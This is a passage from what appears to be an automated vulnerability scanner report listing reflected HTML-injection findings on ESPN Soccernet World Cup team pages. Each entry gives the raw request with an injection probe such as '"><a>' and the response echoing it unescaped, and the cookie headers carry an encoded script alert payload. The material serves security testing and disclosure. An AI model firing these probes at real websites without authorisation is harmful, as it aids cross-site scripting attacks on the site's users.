HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:20:01 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:20:01 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:25:01 GMT Content-Length: 81889 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Netherlands Footbal ...[SNIP]... <a href="/worldcup2010/team?team=449&accaf"><a>fe1ec450d74=1&_slug_=netherlands&accaf"> ...[SNIP]...
2.27. http://soccernet.espn.go.com/worldcup2010/team/_/team/451/south-korea [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/451/south-korea
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e3a"><a>0e9f0d0eed8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/451/south-koreab1e3a"><a>0e9f0d0eed8 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:29:10 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:29:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN33 Cache-Expires: Sat, 06 Nov 2010 23:34:10 GMT Content-Length: 81932 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=451&_slug_=south-koreab1e3a"><a>0e9f0d0eed8&topId=792536&linktext=Huh+decides+not+to+renew+contract"> ...[SNIP]...
2.28. http://soccernet.espn.go.com/worldcup2010/team/_/team/451/south-korea [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/451/south-korea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28a78"><a>ad6c5189518 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/451/south-korea?28a78"><a>ad6c5189518=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:27:28 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:27:28 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sat, 06 Nov 2010 23:32:28 GMT Content-Length: 82040 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=451&28a78"><a>ad6c5189518=1&_slug_=south-korea&28a78"> ...[SNIP]...
2.29. http://soccernet.espn.go.com/worldcup2010/team/_/team/455/greece [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/455/greece
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf60"><a>27f1ff77858 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/455/greece5bf60"><a>27f1ff77858 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:10:41 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:10:41 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Cache-Expires: Sat, 06 Nov 2010 23:15:41 GMT Content-Length: 82126 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Greece Football / S ...[SNIP]... <a href="/worldcup2010/team?team=455&_slug_=greece5bf60"><a>27f1ff77858&topId=766098&linktext=Rehhagel+steps+down+as+Greece+coach"> ...[SNIP]...
2.30. http://soccernet.espn.go.com/worldcup2010/team/_/team/455/greece [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/455/greece
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9866"><a>90f66760c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/455/greece?a9866"><a>90f66760c97=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:55 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sat, 06 Nov 2010 23:13:54 GMT Content-Length: 82234 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Greece Football / S ...[SNIP]... <a href="/worldcup2010/team?team=455&a9866"><a>90f66760c97=1&_slug_=greece&a9866"> ...[SNIP]...
2.31. http://soccernet.espn.go.com/worldcup2010/team/_/team/467/south-africa [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/467/south-africa
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f1e2"><a>30af7f0b19c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/467/south-africa6f1e2"><a>30af7f0b19c HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:58 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:58 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Cache-Expires: Sat, 06 Nov 2010 23:33:58 GMT Content-Length: 82316 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Africa Footba ...[SNIP]... <a href="/worldcup2010/team?team=467&_slug_=south-africa6f1e2"><a>30af7f0b19c&topId=792945&linktext=South+African+president+praises+side"> ...[SNIP]...
2.32. http://soccernet.espn.go.com/worldcup2010/team/_/team/467/south-africa [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/467/south-africa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1ec"><a>0e9b1b1a4b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/467/south-africa?4c1ec"><a>0e9b1b1a4b5=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:27:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:27:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN33 Cache-Expires: Sat, 06 Nov 2010 23:32:12 GMT Content-Length: 82424 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Africa Footba ...[SNIP]... <a href="/worldcup2010/team?team=467&4c1ec"><a>0e9b1b1a4b5=1&_slug_=south-africa&4c1ec"> ...[SNIP]...
|
2.33. http://soccernet.espn.go.com/worldcup2010/team/_/team/468/slovakia [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/468/slovakia
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9049"><a>2c9ee8a6c83 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/468/slovakiac9049"><a>2c9ee8a6c83 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:25 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 06 Nov 2010 23:33:25 GMT
Content-Length: 81977
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovakia Football / ...[SNIP]... <a href="/worldcup2010/team?team=468&_slug_=slovakiac9049"><a>2c9ee8a6c83&topId=803490&linktext=Dutch+ease+to+2-1+win+against+Slovakia"> ...[SNIP]...
2.34. http://soccernet.espn.go.com/worldcup2010/team/_/team/468/slovakia [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/468/slovakia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c864f"><a>dc103401107 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/468/slovakia?c864f"><a>dc103401107=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
